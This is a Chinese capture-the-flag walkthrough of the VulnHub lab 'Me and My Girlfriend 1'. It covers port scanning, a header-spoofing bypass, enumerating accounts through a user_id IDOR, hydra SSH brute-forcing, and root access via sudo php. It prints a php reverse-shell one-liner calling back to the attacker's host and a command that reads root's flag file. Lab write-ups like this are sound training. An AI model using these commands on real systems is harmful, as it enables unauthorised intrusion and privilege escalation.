作者：forwhy 本文已经作者同意并授权

靶场地址：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

这个靶场很简单，算是自己独立完成的第一个靶场，（中间网上看了些资料，其实可以不看的，事后发现自己特傻*）在此记录一下

首先找一下靶机

arp-scan -l #查看同一网段主机

靶机地址：192.168.66.226

nmap 扫描一下端口

nmap -sV -sC -T4 192.168.66.226 -p-

-sV:扫描端口服务

-sC：使用默认脚本扫描

-T4：快速扫描

-p-：扫描全端口

只有两个端口，脑子里已经构思好攻击流程了，web端找漏洞，然后获取用户信息，ssh连接主机或者用九头蛇爆破一下，拿下shell再提权，先访问80端口

凭借着敏锐的直觉，查看一下页面源代码

作者给了提示，x-forwarded-for，我的物理机火狐上面有这个插件，直接用物理机访问一下，成功访问

在这里花费了十多分钟找注入，最后啥也没找到，只好拿着刚刚注册的账号登陆看一下

界面依旧十分简单，还是先找注入，又花了十多分钟，依旧啥也没有，这时候我想放弃了，但又不太甘心。

当我看着profile这个简单但又奇怪的界面时，男人的第六感告诉我这个界面一定有什么东西

我试着换一下id，当hackbar中的user_id从12变成1的时候，我并不期待他能带给我什么，这一步更像是一个理由，一个让我放弃的更加心安理得的理由，页面刷新的很快，没有给我多少思考的时间，当我看到这缺乏美感的Web界面和之前有些不太一样的时候，我很难形容那种感觉。

我仿佛一个上世纪五十年代的美国青年，开着一辆破旧的哈德逊行驶在弗罗里达一条宽阔的柏油路上，周围全是略微发黄的草地，风中夹杂着车上伙伴们的喊叫声，我们漫无目的的在这条望不到头的公路上游荡，却不用担心失去什么。我们一无所有却也乐在其中

好，有点跑题了，这里明显有账户信息遍历，先把账户信息都记下来（不断更换user_id来实现遍历）

按照前面的思路，我把这些信息账号和密码分开，用九头蛇跑一下22端口

hydra -L user.txt -P pass.txt ssh://192.168.1.7 -vv

-L :指定用户列表文件

-P：指定密码列表文件

-vv：显示破解过程详细信息

很快就跑出来了，这个靶场背景就是一个叫alice的女生在和bob谈恋爱的时候喜欢上了另一个男生

直接连一下

看到可疑文件夹.my_secret

那就让我们看一下这个alice究竟有什么秘密吧

她果然喜欢上了别的男人，

再看一下flag有什么提示

根据提示，这个靶场有两个flag，另一个就在root目录下

先试一下能不能suid提权

find / -perm -u=s -type f 2>/dev/null #

#这个suid提权我也讲不清楚，网上有很多讲解的可以搜一下

好像没有能suid提权的，那就看看有没有sudo提权的命令

sudo -l

有一个php，那接下来就很简单了，直接通过php反弹shell就可以了，但我在这卡了很久，我忘记sudo提权需要在命令前加上sudo了，实在太傻了，其实这里有很多种方法提权，或者查看root目录下的flag

我这里写两种

1.反弹shell

首先kali上开启监听

然后在靶机上执行命令

sudo php -r ‘$sock=fsockopen(“192.168.76.218”,8888);exec(“/bin/sh -i <&3 >&3 2>&3”);’

192.168.76.218 是kali ip

8888是kali监听的端口

成功反弹shell，查看flag

2.直接查看flag

sudo php -r “system(‘cat /root/flag2.txt’);”

其实借助php中的system方法有很多方法能够获取flag，这里就不一一列举，这个靶场过程很简单，但是之前的靶场都是需要看教程才能过，这个基本靠自己完成，记录下来纪念一下。